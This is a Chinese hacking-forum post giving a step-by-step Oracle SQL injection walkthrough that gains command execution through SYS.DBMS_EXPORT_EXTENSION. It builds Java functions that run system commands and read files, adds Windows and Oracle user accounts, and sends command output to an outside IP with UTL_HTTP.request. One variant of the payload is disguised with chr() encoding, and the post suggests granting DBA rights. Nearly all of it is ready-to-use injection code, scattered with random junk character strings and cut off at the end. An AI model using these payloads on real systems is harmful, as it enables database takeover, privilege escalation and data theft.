中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]
作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 # i% e" ^) w# M* |! g' _; D
' N4 P+ _* [0 d( v! b/ Z
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
" n& o* H* V# i( h/ q6 h的形式即可。(用" 'a'|| "是为了让语句返回true值) - l  _  w" l' R' `0 h3 q) `
语句有点长,可能要用post提交。 : o2 v' {/ Q1 T& H8 Z! T* h
以下是各个步骤: / T$ u7 k: s) |1 F% l! I" x$ z; }5 k
1.创建包 2 ~' i) a4 J9 K: I
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:* g: `  [: j4 V! i2 N; @3 d
/xxx.jsp?id=1 and '1'<>'a'||(
: D, N. G+ w' }- _, y/ S& sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 D$ R( k* I% K% r
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(* {* g9 i- E6 b( f  ^5 b
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}. ~2 b1 A0 q; ^2 V7 c) S
}'''';END;'';END;--','SYS',0,'1',0) from dual
  ]6 d( c  e1 \/ v$ D+ R1 r6 w)
/ b5 H6 U; E* \& H------------------------
. s9 Z- a7 A) @" x* A如果url有长度限制,可以把readFile()函数块去掉,即:
- v3 m( F& C; p/xxx.jsp?id=1 and '1'<>'a'||(
4 @4 }* P8 ~) \2 o- g& `0 _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': M, q9 A4 K5 [7 [1 W
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(2 I0 _6 b& Z7 m$ [
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
$ i9 w4 I6 k% h/ c" p$ X}'''';END;'';END;--','SYS',0,'1',0) from dual
. M5 k( g: ~; j! _0 j, R) $ J' e, }7 p# H6 w0 Y
同时把后面步骤 提到的 对readFile()的处理语句去掉。
2 ]- T+ P8 S/ V5 ]: j$ d------------------------------
& Y* o+ W4 M" M# s+ ~5 A1 k/ O' _2.赋Java权限
# b9 L/ e) r: o  T4 H7 I. T8 Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual" v0 I. ?4 m# ?! D, d5 I6 @& A
3.创建函数
) Q1 I: u2 M: B" _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 _7 S! c. i' h: ~# [+ ?7 y
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
& Z3 v5 m$ w7 `) a  g& D1 ~/ iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; n2 j7 j8 O; p7 X4 Jcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
! w7 ?$ {" J/ m' a+ \4.赋public执行函数的权限
' L: h! ?& Y% s- E" `$ ^$ eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
, z& K2 x; ^: G+ n+ Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ ?6 _+ y3 G% |8 q& z% s# l. S5.测试上面的几步是否成功
% B) s* d! m# n3 x7 p: z+ p- pand '1'<>'11'||( 4 Q" k) u; D6 R  t9 Z& U
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' : W: E. ?$ k$ o
)
0 T' ^1 Z; o9 [. z. }) nand '1'<>( : P& d$ S' o0 u/ \8 f
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
+ ~5 Q  v& F( i; g- u)
$ s' \6 ^; e% b/ O! w6.执行命令:
' U. Q- {$ p* W. G1 S4 i# e; d- Y- n, D/xxx.jsp?id=1 and '1'<>(
  R' ~/ I% N( B) `  w; mselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual 9 D4 ~' k5 `" x, o8 p/ P
% y0 }8 o) V5 N' L: w
) % w* B( y3 C, t0 {. j4 B" V& X. Q5 L
/xxx.jsp?id=1 and '1'<>(
/ Z" g, H9 C& j$ D# yselect  sys.LinxReadFile('c:/boot.ini') from dual
+ J) j  P; w7 V9 p  S& a3 @- [/ [) ^2 a& e
)# J: z1 q0 b7 _' Z* s
  7 f& A' n. Q/ y! G( a
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 4 |: a* o3 z! x& V$ m; w0 b
如果要查看运行结果可以用 union :
; m/ u, e$ }5 u8 ?" S  E/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual* T" M, G6 j5 V4 {  L6 u8 H
或者UTL_HTTP.request(: 2 \, o8 s% B! J( i0 g/ B( d
/xxx.jsp?id=1 and '1'<>( * M3 P, w- I# k9 B2 y, s; ~
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
2 a+ C6 B9 J3 y7 w0 ^1 A) 2 T; A' q" c& y1 @  w
/xxx.jsp?id=1 and '1'<>( 4 p! ?. M0 p: n/ `1 i6 D
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual- l6 K: H2 A! s
)   ?3 f. S% p" g3 V. _+ t( }
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
3 M- S' c2 k; i1 }! J--------------------
" G) g, `7 v( m- P, H0 [: \6.内部变化 % p* c5 t# |; r; C- Y7 w/ k! i! X
通过以下命令可以查看all_objects表达改变:
" E! |; x1 i+ n9 W" j$ oselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'* `5 O; O& \, R; j$ V* H6 r# o8 [
7.删除我们创建的函数
1 e% V( e& ], y/ I/ i- tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- @$ m" L( d! c1 Bdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 2 {3 B- P, ~, ~: ?# W* H+ T1 b
==================================================== , [8 `5 d/ w5 C0 Q
全文结束。谨以此文赠与我的朋友。
# F( V) ~: G; s  l* `6 nlinx , Z. ~2 ~2 ]: n( S& ~* }
124829445 2 I0 E8 }2 d" c% @  t6 w4 T
2008.1.12 / Q9 Y% }- l8 K% L- B4 \3 I6 G( ?
linyujian@bjfu.edu.cn , {+ b4 S3 |! g. U4 c/ [. a3 d
======================================================================
/ K( G  X0 r8 p测试漏洞的另一方法:
! Q0 ^5 y5 c2 [0 r7 f5 m% d创建oracle帐号: 4 t' ?# p8 Z2 H) u8 U
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% v# E9 A) f/ U& f( |4 R2 c* A  I4 JCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual1 b: |. h: y( J
即: ' V$ o. c/ M/ n' W% v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
! {9 w2 Z: w- l, B7 cchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
: k0 V# H! g2 p9 N4 g* z& f9 o9 ~确定漏洞存在: ) ~2 f; }- C+ K" e2 V/ _) s' C! V
1<>( $ p) c! M+ Z+ I/ i& ~" _
select user_id from all_users where username='LINXSQL' : w) o  M7 t/ v# v# P4 c+ P/ \
) ' j3 H1 W$ f6 v4 k% y0 E  ]
给linxsql连接权限: % W. Z& D3 ~6 Q8 Q# i
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 p9 {. t4 K3 H- ~4 z% |GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
  X$ {* G' `  N删除帐号:
3 A/ o! ?  j  }9 @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  u) Q5 v7 }9 n. \3 a- r1 n$ pdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
( M, u8 K. \3 f( ^4 U====================== % s$ g" n* o# d! x0 O0 ~: {1 l0 s
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:8 q+ i( L6 f! p+ Q9 @. u* ]
1.jsp?id=1 and '1'<>(
5 ~, }/ y' @5 _3 e5 aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 J8 B7 B! A( s0 P) k+ _create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
  K  v% S3 R+ A$ O6 X) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- L$ W( m# Q- p/ J- p2 T
 )& Z+ B% w& E2 h
) a- @! w% I; w$ @
6 X9 \8 h2 U8 ^3 k

% w8 X# L9 `6 M  L! p) O



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2